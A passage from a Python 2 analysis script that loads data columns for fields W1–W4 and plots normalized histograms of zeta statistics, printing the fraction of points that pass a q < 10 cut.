plt.tick_params(axis='y', labelsize=6)
plt.setp(plt.xticks()[1], rotation=90)
subplot = 2
print "finished subplot %d/16; fraction of points inside the q < 10 cut: \n W1_50 %.3f W1_75 %.3f \n W2_50 %.3f W2_75 %.3f \n W3_50 %.3f W3_75 %.3f \n W4_50 %.3f W4_75 %.3f " % (subplot, float(q_W1_50.size)/q_W1_50read.size, float(q_W1_75.size)/q_W1_75read.size, float(q_W2_50.size)/q_W2_50read.size, float(q_W2_75.size)/q_W2_75read.size, float(q_W3_50.size)/q_W3_50read.size, float(q_W3_75.size)/q_W3_75read.size, float(q_W4_50.size)/q_W4_50read.size, float(q_W4_75.size)/q_W4_75read.size)
cols=5
q_W1_50read = np.loadtxt('fieldshistW1_50_%s_%s_size%s_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[4]),str(sys.argv[5])), usecols=[cols], unpack=True)
q_W1_50 = q_W1_50read[q_W1_50read < 10]
q_W2_50read = np.loadtxt('fieldshistW2_50_%s_%s_size%s_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[4]),str(sys.argv[5])), usecols=[cols], unpack=True)
q_W2_50 = q_W2_50read[q_W2_50read < 10]
q_W3_50read = np.loadtxt('fieldshistW3_50_%s_%s_size%s_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[4]),str(sys.argv[5])), usecols=[cols], unpack=True)
q_W3_50 = q_W3_50read[q_W3_50read < 10]
q_W4_50read = np.loadtxt('fieldshistW4_50_%s_%s_size%s_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[4]),str(sys.argv[5])), usecols=[cols], unpack=True)
q_W4_50 = q_W4_50read[q_W4_50read < 10]
q_W1_75read = np.loadtxt('fieldshistW1_75_%s_%s_size%s_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[4]),str(sys.argv[5])), usecols=[cols], unpack=True)
q_W1_75 = q_W1_75read[q_W1_75read < 10]
q_W2_75read = np.loadtxt('fieldshistW2_75_%s_%s_size%s_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[4]),str(sys.argv[5])), usecols=[cols], unpack=True)
q_W2_75 = q_W2_75read[q_W2_75read < 10]
q_W3_75read = np.loadtxt('fieldshistW3_75_%s_%s_size%s_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[4]),str(sys.argv[5])), usecols=[cols], unpack=True)
q_W3_75 = q_W3_75read[q_W3_75read < 10]
q_W4_75read = np.loadtxt('fieldshistW4_75_%s_%s_size%s_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[4]),str(sys.argv[5])), usecols=[cols], unpack=True)
q_W4_75 = q_W4_75read[q_W4_75read < 10]
plt.subplot(453)
rangemax=4
n_q_W1_50, bins_q_W1_50, patches = plt.hist(q_W1_50, histtype='step', color='b', label='W1_50', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax])
n_q_W2_50, bins_q_W2_50, patches = plt.hist(q_W2_50, histtype='step', color='g', label='W2_50', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax])
n_q_W3_50, bins_q_W3_50, patches = plt.hist(q_W3_50, histtype='step', color='r', label='W3_50', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax])
n_q_W4_50, bins_q_W4_50, patches = plt.hist(q_W4_50, histtype='step', color='k', label='W4_50', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax])
n_q_W1_75, bins_q_W1_75, patches = plt.hist(q_W1_75, histtype='step', color='b', label='W1_75', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax], linestyle='dotted')
n_q_W2_75, bins_q_W2_75, patches = plt.hist(q_W2_75, histtype='step', color='g', label='W2_75', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax], linestyle='dotted')
n_q_W3_75, bins_q_W3_75, patches = plt.hist(q_W3_75, histtype='step', color='r', label='W3_75', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax], linestyle='dotted')
n_q_W4_75, bins_q_W4_75, patches = plt.hist(q_W4_75, histtype='step', color='k', label='W4_75', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax], linestyle='dotted')
plt.hist(q_W1_50, histtype='step', color='b', label='W1_50', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax])
plt.hist(q_W2_50, histtype='step', color='g', label='W2_50', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax])
plt.hist(q_W3_50, histtype='step', color='r', label='W3_50', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax])
plt.hist(q_W4_50, histtype='step', color='k', label='W4_50', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax])
plt.hist(q_W1_75, histtype='step', color='b', label='W1_75', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax], linestyle='dotted')
plt.hist(q_W2_75, histtype='step', color='g', label='W2_75', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax], linestyle='dotted')
plt.hist(q_W3_75, histtype='step', color='r', label='W3_75', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax], linestyle='dotted')
plt.hist(q_W4_75, histtype='step', color='k', label='W4_75', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax], linestyle='dotted')
ax=plt.subplot(453)
s = "50: %.3f,%.3f,%.3f" % (bins_q_W1_50[np.argmax(n_q_W1_50)],np.average(q_W1_50),np.median(q_W1_50))
ax.text(0.15, 0.8, s, fontsize=5, color='b',transform=ax.transAxes)
s = "50: %.3f,%.3f,%.3f" % (bins_q_W2_50[np.argmax(n_q_W2_50)],np.average(q_W2_50),np.median(q_W2_50))
ax.text(0.15, 0.6, s, fontsize=5, color='g',transform=ax.transAxes)
s = "50: %.3f,%.3f,%.3f" % (bins_q_W3_50[np.argmax(n_q_W3_50)],np.average(q_W3_50),np.median(q_W3_50))
ax.text(0.15, 0.4, s, fontsize=5, color='r',transform=ax.transAxes)
s = "50: %.3f,%.3f,%.3f" % (bins_q_W4_50[np.argmax(n_q_W4_50)],np.average(q_W4_50),np.median(q_W4_50))
ax.text(0.15, 0.2, s, fontsize=5, color='k',transform=ax.transAxes)
s = "75: %.3f,%.3f,%.3f" % (bins_q_W1_75[np.argmax(n_q_W1_75)],np.average(q_W1_75),np.median(q_W1_75))
ax.text(0.15, 0.7, s, fontsize=5, color='b',transform=ax.transAxes)
s = "75: %.3f,%.3f,%.3f" % (bins_q_W2_75[np.argmax(n_q_W2_75)],np.average(q_W2_75),np.median(q_W2_75))
ax.text(0.15, 0.5, s, fontsize=5, color='g',transform=ax.transAxes)
s = "75: %.3f,%.3f,%.3f" % (bins_q_W3_75[np.argmax(n_q_W3_75)],np.average(q_W3_75),np.median(q_W3_75))
ax.text(0.15, 0.3, s, fontsize=5, color='r',transform=ax.transAxes)
s = "75: %.3f,%.3f,%.3f" % (bins_q_W4_75[np.argmax(n_q_W4_75)],np.average(q_W4_75),np.median(q_W4_75))
ax.text(0.15, 0.1, s, fontsize=5, color='k',transform=ax.transAxes)
plt.xlabel(r'$\zeta_{z}$', fontsize=15)
plt.ylabel("Normalized cnts", fontsize=7)
plt.tick_params(axis='x', labelsize=6)
plt.tick_params(axis='y', labelsize=6)
plt.setp(plt.xticks()[1], rotation=90)
subplot = 3
print "finished subplot %d/16; fraction of points inside the q < 10 cut: \n W1_50 %.3f W1_75 %.3f \n W2_50 %.3f W2_75 %.3f \n W3_50 %.3f W3_75 %.3f \n W4_50 %.3f W4_75 %.3f " % (subplot, float(q_W1_50.size)/q_W1_50read.size, float(q_W1_75.size)/q_W1_75read.size, float(q_W2_50.size)/q_W2_50read.size, float(q_W2_75.size)/q_W2_75read.size, float(q_W3_50.size)/q_W3_50read.size, float(q_W3_75.size)/q_W3_75read.size, float(q_W4_50.size)/q_W4_50read.size, float(q_W4_75.size)/q_W4_75read.size)
cols=7
q_W1_50read = np.loadtxt('fieldshistW1_50_%s_%s_size%s_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[4]),str(sys.argv[5])), usecols=[cols], unpack=True)
q_W1_50 = q_W1_50read[q_W1_50read < 10]
q_W2_50read = np.loadtxt('fieldshistW2_50_%s_%s_size%s_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[4]),str(sys.argv[5])), usecols=[cols], unpack=True)
q_W2_50 = q_W2_50read[q_W2_50read < 10]
q_W3_50read = np.loadtxt('fieldshistW3_50_%s_%s_size%s_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[4]),str(sys.argv[5])), usecols=[cols], unpack=True)
q_W3_50 = q_W3_50read[q_W3_50read < 10]
q_W4_50read = np.loadtxt('fieldshistW4_50_%s_%s_size%s_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[4]),str(sys.argv[5])), usecols=[cols], unpack=True)
q_W4_50 = q_W4_50read[q_W4_50read < 10]
q_W1_75read = np.loadtxt('fieldshistW1_75_%s_%s_size%s_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[4]),str(sys.argv[5])), usecols=[cols], unpack=True)
q_W1_75 = q_W1_75read[q_W1_75read < 10]
q_W2_75read = np.loadtxt('fieldshistW2_75_%s_%s_size%s_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[4]),str(sys.argv[5])), usecols=[cols], unpack=True)
q_W2_75 = q_W2_75read[q_W2_75read < 10]
q_W3_75read = np.loadtxt('fieldshistW3_75_%s_%s_size%s_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[4]),str(sys.argv[5])), usecols=[cols], unpack=True)
q_W3_75 = q_W3_75read[q_W3_75read < 10]
q_W4_75read = np.loadtxt('fieldshistW4_75_%s_%s_size%s_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[4]),str(sys.argv[5])), usecols=[cols], unpack=True)
q_W4_75 = q_W4_75read[q_W4_75read < 10]
plt.subplot(454)
rangemax=4
n_q_W1_50, bins_q_W1_50, patches = plt.hist(q_W1_50, histtype='step', color='b', label='W1_50', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax])
n_q_W2_50, bins_q_W2_50, patches = plt.hist(q_W2_50, histtype='step', color='g', label='W2_50', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax])
n_q_W3_50, bins_q_W3_50, patches = plt.hist(q_W3_50, histtype='step', color='r', label='W3_50', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax])
n_q_W4_50, bins_q_W4_50, patches = plt.hist(q_W4_50, histtype='step', color='k', label='W4_50', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax])
n_q_W1_75, bins_q_W1_75, patches = plt.hist(q_W1_75, histtype='step', color='b', label='W1_75', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax], linestyle='dotted')
n_q_W2_75, bins_q_W2_75, patches = plt.hist(q_W2_75, histtype='step', color='g', label='W2_75', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax], linestyle='dotted')
n_q_W3_75, bins_q_W3_75, patches = plt.hist(q_W3_75, histtype='step', color='r', label='W3_75', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax], linestyle='dotted')
n_q_W4_75, bins_q_W4_75, patches = plt.hist(q_W4_75, histtype='step', color='k', label='W4_75', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax], linestyle='dotted')
plt.hist(q_W1_50, histtype='step', color='b', label='W1_50', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax])
plt.hist(q_W2_50, histtype='step', color='g', label='W2_50', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax])
plt.hist(q_W3_50, histtype='step', color='r', label='W3_50', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax])
plt.hist(q_W4_50, histtype='step', color='k', label='W4_50', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax])
plt.hist(q_W1_75, histtype='step', color='b', label='W1_75', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax], linestyle='dotted')
plt.hist(q_W2_75, histtype='step', color='g', label='W2_75', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax], linestyle='dotted')
plt.hist(q_W3_75, histtype='step', color='r', label='W3_75', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax], linestyle='dotted')
plt.hist(q_W4_75, histtype='step', color='k', label='W4_75', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax], linestyle='dotted')
ax=plt.subplot(454)
s = "50: %.3f,%.3f,%.3f" % (bins_q_W1_50[np.argmax(n_q_W1_50)],np.average(q_W1_50),np.median(q_W1_50))
ax.text(0.15, 0.8, s, fontsize=5, color='b',transform=ax.transAxes)
s = "50: %.3f,%.3f,%.3f" % (bins_q_W2_50[np.argmax(n_q_W2_50)],np.average(q_W2_50),np.median(q_W2_50))
ax.text(0.15, 0.6, s, fontsize=5, color='g',transform=ax.transAxes)
s = "50: %.3f,%.3f,%.3f" % (bins_q_W3_50[np.argmax(n_q_W3_50)],np.average(q_W3_50),np.median(q_W3_50))
ax.text(0.15, 0.4, s, fontsize=5, color='r',transform=ax.transAxes)
s = "50: %.3f,%.3f,%.3f" % (bins_q_W4_50[np.argmax(n_q_W4_50)],np.average(q_W4_50),np.median(q_W4_50))
ax.text(0.15, 0.2, s, fontsize=5, color='k',transform=ax.transAxes)
s = "75: %.3f,%.3f,%.3f" % (bins_q_W1_75[np.argmax(n_q_W1_75)],np.average(q_W1_75),np.median(q_W1_75))
ax.text(0.15, 0.7, s, fontsize=5, color='b',transform=ax.transAxes)
s = "75: %.3f,%.3f,%.3f" % (bins_q_W2_75[np.argmax(n_q_W2_75)],np.average(q_W2_75),np.median(q_W2_75))
ax.text(0.15, 0.5, s, fontsize=5, color='g',transform=ax.transAxes)
s = "75: %.3f,%.3f,%.3f" % (bins_q_W3_75[np.argmax(n_q_W3_75)],np.average(q_W3_75),np.median(q_W3_75))
ax.text(0.15, 0.3, s, fontsize=5, color='r',transform=ax.transAxes)
s = "75: %.3f,%.3f,%.3f" % (bins_q_W4_75[np.argmax(n_q_W4_75)],np.average(q_W4_75),np.median(q_W4_75))
ax.text(0.15, 0.1, s, fontsize=5, color='k',transform=ax.transAxes)
plt.xlabel(r'$\zeta_{M}$', fontsize=15)
plt.ylabel("Normalized cnts", fontsize=7)
plt.tick_params(axis='x', labelsize=6)
plt.tick_params(axis='y', labelsize=6)
plt.setp(plt.xticks()[1], rotation=90)
subplot = 4
print "finished subplot %d/16; fraction of points inside the q < 10 cut: \n W1_50 %.3f W1_75 %.3f \n W2_50 %.3f W2_75 %.3f \n W3_50 %.3f W3_75 %.3f \n W4_50 %.3f W4_75 %.3f " % (subplot, float(q_W1_50.size)/q_W1_50read.size, float(q_W1_75.size)/q_W1_75read.size, float(q_W2_50.size)/q_W2_50read.size, float(q_W2_75.size)/q_W2_75read.size, float(q_W3_50.size)/q_W3_50read.size, float(q_W3_75.size)/q_W3_75read.size, float(q_W4_50.size)/q_W4_50read.size, float(q_W4_75.size)/q_W4_75read.size)
cols=9
q_W1_50read = np.loadtxt('fieldshistW1_50_%s_%s_size%s_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[4]),str(sys.argv[5])), usecols=[cols], unpack=True)
q_W1_50 = q_W1_50read[q_W1_50read < 10]
q_W2_50read = np.loadtxt('fieldshistW2_50_%s_%s_size%s_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[4]),str(sys.argv[5])), usecols=[cols], unpack=True)
q_W2_50 = q_W2_50read[q_W2_50read < 10]
q_W3_50read = np.loadtxt('fieldshistW3_50_%s_%s_size%s_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[4]),str(sys.argv[5])), usecols=[cols], unpack=True)
q_W3_50 = q_W3_50read[q_W3_50read < 10]
q_W4_50read = np.loadtxt('fieldshistW4_50_%s_%s_size%s_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[4]),str(sys.argv[5])), usecols=[cols], unpack=True)
q_W4_50 = q_W4_50read[q_W4_50read < 10]
q_W1_75read = np.loadtxt('fieldshistW1_75_%s_%s_size%s_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[4]),str(sys.argv[5])), usecols=[cols], unpack=True)
q_W1_75 = q_W1_75read[q_W1_75read < 10]
q_W2_75read = np.loadtxt('fieldshistW2_75_%s_%s_size%s_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[4]),str(sys.argv[5])), usecols=[cols], unpack=True)
q_W2_75 = q_W2_75read[q_W2_75read < 10]
q_W3_75read = np.loadtxt('fieldshistW3_75_%s_%s_size%s_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[4]),str(sys.argv[5])), usecols=[cols], unpack=True)
q_W3_75 = q_W3_75read[q_W3_75read < 10]
q_W4_75read = np.loadtxt('fieldshistW4_75_%s_%s_size%s_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[4]),str(sys.argv[5])), usecols=[cols], unpack=True)
q_W4_75 = q_W4_75read[q_W4_75read < 10]
plt.subplot(456)
rangemax=7
n_q_W1_50, bins_q_W1_50, patches = plt.hist(q_W1_50, histtype='step', color='b', label='W1_50', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax])
n_q_W2_50, bins_q_W2_50, patches = plt.hist(q_W2_50, histtype='step', color='g', label='W2_50', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax])
n_q_W3_50, bins_q_W3_50, patches = plt.hist(q_W3_50, histtype='step', color='r', label='W3_50', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax])
n_q_W4_50, bins_q_W4_50, patches = plt.hist(q_W4_50, histtype='step', color='k', label='W4_50', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax])
n_q_W1_75, bins_q_W1_75, patches = plt.hist(q_W1_75, histtype='step', color='b', label='W1_75', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax], linestyle='dotted')
n_q_W2_75, bins_q_W2_75, patches = plt.hist(q_W2_75, histtype='step', color='g', label='W2_75', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax], linestyle='dotted')
n_q_W3_75, bins_q_W3_75, patches = plt.hist(q_W3_75, histtype='step', color='r', label='W3_75', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax], linestyle='dotted')
n_q_W4_75, bins_q_W4_75, patches = plt.hist(q_W4_75, histtype='step', color='k', label='W4_75', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax], linestyle='dotted')
plt.hist(q_W1_50, histtype='step', color='b', label='W1_50', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax])
plt.hist(q_W2_50, histtype='step', color='g', label='W2_50', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax])
plt.hist(q_W3_50, histtype='step', color='r', label='W3_50', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax])
plt.hist(q_W4_50, histtype='step', color='k', label='W4_50', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax])
plt.hist(q_W1_75, histtype='step', color='b', label='W1_75', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax], linestyle='dotted')
plt.hist(q_W2_75, histtype='step', color='g', label='W2_75', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax], linestyle='dotted')
plt.hist(q_W3_75, histtype='step', color='r', label='W3_75', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax], linestyle='dotted')
plt.hist(q_W4_75, histtype='step', color='k', label='W4_75', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax], linestyle='dotted')
ax=plt.subplot(456)
s = "50: %.3f,%.3f,%.3f" % (bins_q_W1_50[np.argmax(n_q_W1_50)],np.average(q_W1_50),np.median(q_W1_50))
ax.text(0.15, 0.8, s, fontsize=5, color='b',transform=ax.transAxes)
s = "50: %.3f,%.3f,%.3f" % (bins_q_W2_50[np.argmax(n_q_W2_50)],np.average(q_W2_50),np.median(q_W2_50))
ax.text(0.15, 0.6, s, fontsize=5, color='g',transform=ax.transAxes)
s = "50: %.3f,%.3f,%.3f" % (bins_q_W3_50[np.argmax(n_q_W3_50)],np.average(q_W3_50),np.median(q_W3_50))
ax.text(0.15, 0.4, s, fontsize=5, color='r',transform=ax.transAxes)
s = "50: %.3f,%.3f,%.3f" % (bins_q_W4_50[np.argmax(n_q_W4_50)],np.average(q_W4_50),np.median(q_W4_50))
ax.text(0.15, 0.2, s, fontsize=5, color='k',transform=ax.transAxes)
s = "75: %.3f,%.3f,%.3f" % (bins_q_W1_75[np.argmax(n_q_W1_75)],np.average(q_W1_75),np.median(q_W1_75))
ax.text(0.15, 0.7, s, fontsize=5, color='b',transform=ax.transAxes)
s = "75: %.3f,%.3f,%.3f" % (bins_q_W2_75[np.argmax(n_q_W2_75)],np.average(q_W2_75),np.median(q_W2_75))
ax.text(0.15, 0.5, s, fontsize=5, color='g',transform=ax.transAxes)
s = "75: %.3f,%.3f,%.3f" % (bins_q_W3_75[np.argmax(n_q_W3_75)],np.average(q_W3_75),np.median(q_W3_75))
ax.text(0.15, 0.3, s, fontsize=5, color='r',transform=ax.transAxes)
s = "75: %.3f,%.3f,%.3f" % (bins_q_W4_75[np.argmax(n_q_W4_75)],np.average(q_W4_75),np.median(q_W4_75))
ax.text(0.15, 0.1, s, fontsize=5, color='k',transform=ax.transAxes)
plt.xlabel(r'$\zeta_{M^2}$', fontsize=15)
plt.ylabel("Normalized cnts", fontsize=7)
plt.tick_params(axis='x', labelsize=6)
plt.tick_params(axis='y', labelsize=6)
plt.setp(plt.xticks()[1], rotation=90)
subplot = 5
print "finished subplot %d/16; fraction of points inside the q < 10 cut: \n W1_50 %.3f W1_75 %.3f \n W2_50 %.3f W2_75 %.3f \n W3_50 %.3f W3_75 %.3f \n W4_50 %.3f W4_75 %.3f " % (subplot, float(q_W1_50.size)/q_W1_50read.size, float(q_W1_75.size)/q_W1_75read.size, float(q_W2_50.size)/q_W2_50read.size, float(q_W2_75.size)/q_W2_75read.size, float(q_W3_50.size)/q_W3_50read.size, float(q_W3_75.size)/q_W3_75read.size, float(q_W4_50.size)/q_W4_50read.size, float(q_W4_75.size)/q_W4_75read.size)
cols=11
q_W1_50read = np.loadtxt('fieldshistW1_50_%s_%s_size%s_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[4]),str(sys.argv[5])), usecols=[cols], unpack=True)
q_W1_50 = q_W1_50read[q_W1_50read < 10]
q_W2_50read = np.loadtxt('fieldshistW2_50_%s_%s_size%s_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[4]),str(sys.argv[5])), usecols=[cols], unpack=True)
q_W2_50 = q_W2_50read[q_W2_50read < 10]
q_W3_50read = np.loadtxt('fieldshistW3_50_%s_%s_size%s_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[4]),str(sys.argv[5])), usecols=[cols], unpack=True)
q_W3_50 = q_W3_50read[q_W3_50read < 10]
q_W4_50read = np.loadtxt('fieldshistW4_50_%s_%s_size%s_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[4]),str(sys.argv[5])), usecols=[cols], unpack=True)
q_W4_50 = q_W4_50read[q_W4_50read < 10]
q_W1_75read = np.loadtxt('fieldshistW1_75_%s_%s_size%s_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[4]),str(sys.argv[5])), usecols=[cols], unpack=True)
q_W1_75 = q_W1_75read[q_W1_75read < 10]
q_W2_75read = np.loadtxt('fieldshistW2_75_%s_%s_size%s_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[4]),str(sys.argv[5])), usecols=[cols], unpack=True)
q_W2_75 = q_W2_75read[q_W2_75read < 10]
q_W3_75read = np.loadtxt('fieldshistW3_75_%s_%s_size%s_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[4]),str(sys.argv[5])), usecols=[cols], unpack=True)
q_W3_75 = q_W3_75read[q_W3_75read < 10]
q_W4_75read = np.loadtxt('fieldshistW4_75_%s_%s_size%s_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[4]),str(sys.argv[5])), usecols=[cols], unpack=True)
q_W4_75 = q_W4_75read[q_W4_75read < 10]
plt.subplot(457)
rangemax=6
n_q_W1_50, bins_q_W1_50, patches = plt.hist(q_W1_50, histtype='step', color='b', label='W1_50', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax])
n_q_W2_50, bins_q_W2_50, patches = plt.hist(q_W2_50, histtype='step', color='g', label='W2_50', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax])
n_q_W3_50, bins_q_W3_50, patches = plt.hist(q_W3_50, histtype='step', color='r', label='W3_50', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax])
n_q_W4_50, bins_q_W4_50, patches = plt.hist(q_W4_50, histtype='step', color='k', label='W4_50', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax])
n_q_W1_75, bins_q_W1_75, patches = plt.hist(q_W1_75, histtype='step', color='b', label='W1_75', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax], linestyle='dotted')
n_q_W2_75, bins_q_W2_75, patches = plt.hist(q_W2_75, histtype='step', color='g', label='W2_75', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax], linestyle='dotted')
n_q_W3_75, bins_q_W3_75, patches = plt.hist(q_W3_75, histtype='step', color='r', label='W3_75', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax], linestyle='dotted')
n_q_W4_75, bins_q_W4_75, patches = plt.hist(q_W4_75, histtype='step', color='k', label='W4_75', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax], linestyle='dotted')
plt.hist(q_W1_50, histtype='step', color='b', label='W1_50', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax])
plt.hist(q_W2_50, histtype='step', color='g', label='W2_50', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax])
plt.hist(q_W3_50, histtype='step', color='r', label='W3_50', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax])
plt.hist(q_W4_50, histtype='step', color='k', label='W4_50', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax])
plt.hist(q_W1_75, histtype='step', color='b', label='W1_75', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax], linestyle='dotted')
plt.hist(q_W2_75, histtype='step', color='g', label='W2_75', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax], linestyle='dotted')
plt.hist(q_W3_75, histtype='step', color='r', label='W3_75', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax], linestyle='dotted')
plt.hist(q_W4_75, histtype='step', color='k', label='W4_75', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax], linestyle='dotted')
ax=plt.subplot(457)
s = "50: %.3f,%.3f,%.3f" % (bins_q_W1_50[np.argmax(n_q_W1_50)],np.average(q_W1_50),np.median(q_W1_50))
ax.text(0.15, 0.8, s, fontsize=5, color='b',transform=ax.transAxes)
s = "50: %.3f,%.3f,%.3f" % (bins_q_W2_50[np.argmax(n_q_W2_50)],np.average(q_W2_50),np.median(q_W2_50))
ax.text(0.15, 0.6, s, fontsize=5, color='g',transform=ax.transAxes)
s = "50: %.3f,%.3f,%.3f" % (bins_q_W3_50[np.argmax(n_q_W3_50)],np.average(q_W3_50),np.median(q_W3_50))
ax.text(0.15, 0.4, s, fontsize=5, color='r',transform=ax.transAxes)
s = "50: %.3f,%.3f,%.3f" % (bins_q_W4_50[np.argmax(n_q_W4_50)],np.average(q_W4_50),np.median(q_W4_50))
ax.text(0.15, 0.2, s, fontsize=5, color='k',transform=ax.transAxes)
s = "75: %.3f,%.3f,%.3f" % (bins_q_W1_75[np.argmax(n_q_W1_75)],np.average(q_W1_75),np.median(q_W1_75))
ax.text(0.15, 0.7, s, fontsize=5, color='b',transform=ax.transAxes)
s = "75: %.3f,%.3f,%.3f" % (bins_q_W2_75[np.argmax(n_q_W2_75)],np.average(q_W2_75),np.median(q_W2_75))
ax.text(0.15, 0.5, s, fontsize=5, color='g',transform=ax.transAxes)
s = "75: %.3f,%.3f,%.3f" % (bins_q_W3_75[np.argmax(n_q_W3_75)],np.average(q_W3_75),np.median(q_W3_75))
ax.text(0.15, 0.3, s, fontsize=5, color='r',transform=ax.transAxes)
s = "75: %.3f,%.3f,%.3f" % (bins_q_W4_75[np.argmax(n_q_W4_75)],np.average(q_W4_75),np.median(q_W4_75))
ax.text(0.15, 0.1, s, fontsize=5, color='k',transform=ax.transAxes)
plt.xlabel(r'$\zeta_{M^2_{rms}}$', fontsize=15)
plt.ylabel("Normalized cnts", fontsize=7)
plt.tick_params(axis='x', labelsize=6)
plt.tick_params(axis='y', labelsize=6)
